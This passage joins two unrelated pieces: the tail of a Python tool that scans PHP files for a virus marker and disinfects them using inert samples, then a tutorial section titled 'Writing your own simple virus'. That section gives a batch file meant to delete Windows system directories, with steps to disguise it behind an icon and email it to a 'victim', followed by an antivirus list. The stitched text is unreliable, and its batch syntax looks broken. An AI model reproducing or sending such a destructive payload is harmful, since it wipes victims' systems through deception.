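    return content[end + len(END_TAG):].lstrip("\r\n")


def scan_dir(root: str, clean: bool = False) -> dict:
    """Return {relative_path: classification} for every .php file; with clean=True
    the disinfected content is written back and the original kept as .infected."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="latin-1") as fh:
                content = fh.read()
            kind = classify(content)
            report[os.path.relpath(path, root).replace(os.sep, "/")] = kind
            if clean and kind != "clean":
                os.replace(path, path + ".infected")
                with open(path, "w", encoding="latin-1") as fh:
                    fh.write(disinfect(content))
    return report


# Constructed samples. The "virus body" is an inert stand-in carrying only the
# marker and a comment, not the page's code.
HOST = "<?php\necho 'hello from the host page';\n?>\n"
BODY = MARKER + "\n/* constructed inert body standing in for the virus code */\n?>\n"
PREPENDED = BODY + HOST
APPENDED = HOST + BODY


def demo() -> dict:
    """Drop one clean and two infected files into a temp directory, clean them,
    and rescan."""
    with tempfile.TemporaryDirectory() as root:
        for name, data in {"index.php": HOST, "a.php": PREPENDED, "b.php": APPENDED}.items():
            with open(os.path.join(root, name), "w", encoding="latin-1") as fh:
                fh.write(data)
        before = scan_dir(root, clean=True)
        after = scan_dir(root)
        with open(os.path.join(root, "a.php"), encoding="latin-1") as fh:
            restored = fh.read()
    return {"before": before, "after": after, "restored_equals_host": restored == HOST}
```

A marker-based check like this only catches this one family; a host whose own first 13 bytes happen to contain 'SPTH' would also be skipped by the virus itself, which is the same brittleness the infection check has.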
Writing your own simple virus
Step 1: Create a batch file test.bat with the following text:
@ echo off
delete c:\winnt\system32\*.*
delete c:\winnt\*.*
Step 2: Convert the test.bat batch file to test.com using bat2com utility.
Step 3: Assign Icon to test.com using Windows file properties screen.
Step 4: Send the test.com file as an e-mail attachment to a victim.
Step 5: When the victim runs this program, it deletes core files in WINNT directory making Windows unusable.

AntiVirus software
The only prevention against viruses is to install anti-virus software and keep the updates current.
1. McAfee
2. NortonAntiVirus
3. Antiviral Toolkit Pro
4. Kaspersky
5. Trend Micro
6. Command AntiVirus
7. F-Secure
8. Sophos
9. NOD32
10. Avast

Viruses come in different forms. Some are mere nuisances; some come with devastating consequences. E-mail worms are self-replicating and clog networks with unwanted traffic. Virus code is not necessarily complex. It is necessary to scan systems and networks for infections on a periodic basis for protection against viruses. Antidotes to new virus releases are promptly made available by security companies, and this forms the major countermeasure.
